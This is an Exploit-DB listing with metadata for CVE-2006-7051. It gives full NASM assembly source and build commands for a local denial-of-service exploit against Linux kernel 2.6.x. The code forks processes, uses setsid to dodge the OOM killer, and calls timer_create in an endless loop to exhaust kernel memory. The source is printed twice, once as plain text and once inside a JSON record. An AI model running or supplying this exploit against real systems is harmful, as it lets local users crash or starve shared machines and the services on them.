Linux Kernel 2.6.x - sys_timer_create Local Denial of Service Exploit
2006-04-09T00:00:00
ID EDB-ID:1657 Type exploitdb Reporter fingerout Modified 2006-04-09T00:00:00
Description
Linux Kernel 2.6.x sys_timer_create() Local Denial of Service Exploit. CVE-2006-7051. Dos exploit for linux platform
;nasm -f elf noHeaven.asm
;ld -s -o noHeaven noHeaven.o
section .text
global _start
count equ 8 ; threads count - do it quicker
_start:
mov ebx, count
call create_threads
jmp done
_pause:
mov eax,29
int 0x80
ret
create_threads:
mov eax,2
int 0x80
test eax,eax
jz consume
dec ebx
test ebx,ebx
jnz create_threads
ret
consume:
setsid: ; so we won't get counted as one thread in oom_killer()
xor ebx,ebx ; each task will have about 20 oom_score which
mov eax,66 ; is less than 'init' and others
int 0x80
push eax
loopek:
mov eax,259
mov ebx,0
mov ecx,0
mov edx,esp
int 0x80
jmp loopek
done:
xor ebx,ebx
mov eax,1
int 0x80
; milw0rm.com [2006-04-09]
{"bulletinFamily": "exploit", "id": "EDB-ID:1657", "cvelist": ["CVE-2006-7051"], "modified": "2006-04-09T00:00:00", "lastseen": "2016-01-31T14:37:54", "edition": 1, "sourceData": ";nasm -f elf noHeaven.asm\n;ld -s -o noHeaven noHeaven.o\n\nsection .text\n global _start\n\ncount equ 8 ; threads count - do it quicker\n\n_start:\n mov ebx, count\n call create_threads\n jmp done\n_pause:\n mov eax,29\n int 0x80\n ret\ncreate_threads:\n mov eax,2\n int 0x80\n test eax,eax\n jz consume\n dec ebx\n test ebx,ebx\n jnz create_threads\n ret\nconsume:\nsetsid: ; so we won't get counted as one thread in oom_killer()\n xor ebx,ebx ; each task will have about 20 oom_score which\n mov eax,66 ; is less than 'init' and others\n int 0x80\n push eax\nloopek:\n mov eax,259\n mov ebx,0\n mov ecx,0\n mov edx,esp\n int 0x80\n jmp loopek\ndone:\n xor ebx,ebx\n mov eax,1\n int 0x80\n\n; milw0rm.com [2006-04-09]\n", "published": "2006-04-09T00:00:00", "href": "https://www.exploit-db.com/exploits/1657/", "osvdbidlist": ["40963"], "reporter": "fingerout", "hash": "6bb14b1b28bbe3490e31d2e7f34708e2af3b33c615a2142a42ba147a3df07da9", "title": "Linux Kernel 2.6.x - sys_timer_create Local Denial of Service Exploit", "history": [], "type": "exploitdb", "objectVersion": "1.0", "description": "Linux Kernel 2.6.x sys_timer_create() Local Denial of Service Exploit. CVE-2006-7051. Dos exploit for linux platform", "references": [], "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/1657/", "enchantments": {"vulnersScore": 2.1}}
{"result": {"cve": [{"id": "CVE-2006-7051", "type": "cve", "title": "CVE-2006-7051", "description": "The sys_timer_create function in posix-timers.c for Linux kernel 2.6.x allows local users to cause a denial of service (memory consumption) and possibly bypass memory limits or cause other processes to be killed by creating a large number of posix timers, which are allocated in kernel memory but are not treated as part of the process' memory.", "published": "2007-02-23T19:28:00", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-7051", "cvelist": ["CVE-2006-7051"], "lastseen": "2017-10-11T11:06:55"}]}}